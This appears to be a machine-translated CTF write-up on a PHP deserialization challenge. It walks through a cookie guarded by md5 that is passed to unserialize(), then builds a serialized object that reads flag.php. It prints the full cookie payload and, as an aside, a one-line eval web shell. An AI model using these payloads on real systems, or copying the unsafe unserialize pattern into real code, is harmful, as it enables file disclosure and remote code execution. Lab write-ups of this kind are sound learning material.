One 、 Source code analysis

First, look at the source code ：

<?php
Class readme{
    public function __toString()
    {
        return highlight_file('Readme.txt', true).highlight_file($this->source, true);
    }
}
if(isset($_GET['source'])){
    $s = new readme();
    $s->source = __FILE__;
    echo $s;
    exit;
}
//$todos = [];
if(isset($_COOKIE['todos'])){
    $c = $_COOKIE['todos'];
    $h = substr($c, 0, 32);
    $m = substr($c, 32);
    if(md5($m) === $h){
        $todos = unserialize($m);
    }
}
if(isset($_POST['text'])){
    $todo = $_POST['text'];
    $todos[] = $todo;
    $m = serialize($todos);
    $h = md5($m);
    setcookie('todos', $h.$m);
    header('Location: '.$_SERVER['REQUEST_URI']);
    exit;
}
?>
<html>
<head>
</head>

<h1>Readme</h1>
<a href="?source"><h2>Check Code</h2></a>
<ul>
<?php foreach($todos as $todo):?>
    <li><?=$todo?></li>
<?php endforeach;?>
</ul>

<form method="post" href=".">
    <textarea name="text"></textarea>
    <input type="submit" value="store">
</form>

Analyze the source code ：
See... From the source code , Defines a class , The name is readme.readme Used in __toString() function , This function is PHP One of several common magic methods in （ Magic method refers to the function that will automatically trigger when certain conditions are met ）, This method will automatically trigger when an object is output as a string . Note that this refers to the object after instantiating the class , Not variables .
In the third line of the source code highlight_file() The syntax of the function is ：

highlight_file(filename,return)

This function is to syntax highlight the contents of the file , there return If it should be true, Then the function will return the highlighted code .
Now let's look at the following code ：

This means if yes source The parameters are GET The ginseng , Will be readme This class instantiates an object , by $s
This object will call source Method and assign it as the absolute path of the script . Next line echo $s Indicates that the object is output as a string , This means the front __toString Function will automatically trigger .
See a at the end exit, This means that the code will stop executing when it reaches here , It means __FILE__ Cannot be changed to the specified value , That is, the parameter is uncontrollable .

Then look at cookie The code of the parameter transmission part ：

See one of them substr() Function is , The syntax of this function is ：
substr(string,start,length)
here start The parameter represents the starting position of string cutting , Is a required parameter ,length Parameters are optional , The default is to cut to the end of the string .
So the code here is easy to understand ：

substr($c, 0, 32); \\ Represents the intercepted string c Before 32 position （ Including the first 32 position ）,
substr($c, 32);\\ Represents the... Of the intercepted string 32 All after bit （ Excluding the 32 position ）.

Combined with the following if Conditions in , Here we can come to the conclusion that ：
Incoming cookie The string of the parameter is composed of $h and $m form , and $h It's actually $m after md5 Encrypted value .

Look down POST The code in the transmission parameter , In fact, the meaning of this code is to read the user through POST Pass parameters to text String for parameter , Then serialize it , In part md5 encryption , The other part remains the same , Then combine it into a new string , And set to cookie Parameters , The parameter name is todos.
Finally, set up header Of location Parameters , Get with predefined variables URI（ Uniform resource identifiers ）.
Look at the output points on the page ：

<?php foreach($todos as $todo):?>
<li><?=$todo?></li>
// Key value separation , And the output $todo Value 

It's about php A special way of writing , For example, a common sentence, Trojan horse is generally written like this ：

<?php eval($_REQUEST[8])?>

In fact, it can also be written like this ：

<?=eval($_REQUEST[8])?>

If this is a function , be = The number will be automatically converted to php, And if it's a variable , Then the value of this variable will be output , for example ：

<?=$a=1?> // amount to <?php echo $a=1 ?>

After execution, it will output 1.

Two 、 Transmission parameter analysis

Through the source code analysis of the shooting range , Understand the basic content and meaning of the source code ,
It can be determined that GET and POST Methods are interference options , Therefore, we should focus on cookie The source code of parameter transmission .
Next, consider how to pass parameters to access flag.php file .
According to the source code of the shooting range , If you can $source To change the value of ’flag.php’ Can be output flag.php The content of .
Now we need to complete two steps , They are to find the deserialization function and the output point .
The location of the inverse sequence function needs to be cookie It can only be accessed by transferring parameters . There are two points that will output objects as strings , One is GET In the biography of reference echo, Another is the output point on the page . Obviously ,GET There is exit, Therefore, it cannot run to the following code , You can't get cookie The ginseng , Can't be used . Therefore, we need to start with the output point on the page .
By analyzing the source code , The parameters we pass in need to be processed by the deserialization function , Output point is foreach function , and foreach Function $todos It must be an array , Therefore, we need to serialize the parameters , And pass it in the form of an array .
Copy part of the source code , Modify some codes locally , Because I want to visit flag.php, And you need to serialize the data , Therefore, the modified code is shown in the figure ：

<?PHP
Class readme{
    
    public function __toString()
    {
    
        return highlight_file('Readme.txt', true).highlight_file($this->source, true);
    }
	}
$s = new readme();
$s -> source ='flag.php';
$s=[$s];
/*  Pay attention here , Use [] The only way to define a short array is PHP edition >=5.4 Can only be used when , Otherwise, you need to use array() Function to define an array  */
echo serialize($s);
exit;
?>

The final output ：

a:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";}}

Now we need to analyze how to make the deserialization function execute the parameters we passed in , Look at the source code ：

if(isset($_COOKIE['todos'])){
    
    $c = $_COOKIE['todos'];
    $h = substr($c, 0, 32);
    $m = substr($c, 32);
    if(md5($m) === $h){
    
        $todos = unserialize($m);
    }

Pass parameters with cookie In the form of , And it will be cut by string processing function . The input parameters are determined by $c receive , This parameter will be divided into $h and $m, and $h It's actually $m after md5 Encrypted value .
So in conclusion , To meet the conditions of this question , The values of the three variables should be as follows ：

$h=e2d4f7dcc43ee1db7f69e76303d0105c
$m=a:1:{
    i:0;O:6:"readme":1:{
    s:6:"source";s:8:"flag.php";}}
$c=e2d4f7dcc43ee1db7f69e76303d0105ca:1:{
    i:0;O:6:"readme":1:{
    s:6:"source";s:8:"flag.php";}}

So just use $c The value of is right todos Parameters cookie You can get flag Value .
To carry out cookie The ginseng , There are many ways , You can use plug-ins 、 Console 、 Or bag grabbing tool .
If you use packet capturing to transfer parameters, you need to do it once URL code , Here the burp Biography of ginseng , First, pass the parameter once URL code ：

e2d4f7dcc43ee1db7f69e76303d0105ca%3A1%3A%7Bi%3A0%3BO%3A6%3A%22readme%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D

Then grab the bag and transfer parameters .

3、 ... and 、 Summary

This article shares a deserialized CTF topic , And a detailed analysis of the source code and parameter settings , I hope it is helpful for everyone to learn penetration testing .